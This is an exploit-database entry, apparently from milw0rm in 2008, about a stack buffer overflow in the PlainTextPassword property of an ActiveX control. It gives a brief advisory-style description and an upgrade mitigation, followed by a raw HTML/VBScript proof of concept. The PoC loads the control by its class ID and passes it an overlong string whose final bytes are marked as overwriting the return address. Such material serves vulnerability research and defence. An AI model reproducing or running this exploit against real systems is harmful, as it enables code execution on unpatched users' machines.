header-logo
Suggest Exploit
vendor:
N/A
by:
Thomas Pollet
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

milw0rm.com [2008-10-16]

A buffer overflow vulnerability exists in the PlainTextPassword property of the FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2 ActiveX control. The vulnerability is caused due to a boundary error when handling a specially crafted argument passed to the PlainTextPassword property. This can be exploited to cause a stack-based buffer overflow by e.g. supplying a long string of data as argument. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of the FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2 ActiveX control.
Source

Exploit-DB raw data:

<html>

<!--

the latest version of this activex (13.0) is compiled with /gs,  earlier versions aren't.
The XXXX would have overwritten return address.
by thomas.pollet@gmail.com

-->

<object classid='clsid:FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2' id='target' ></object>
<script language='vbscript'>
arg1="001101220123012401250126012701280129012:012;012<012=012>012?012@012A012B012C012D012E012FXXXX"
target.PlainTextPassword = arg1

</script>
</html>


# milw0rm.com [2008-10-16]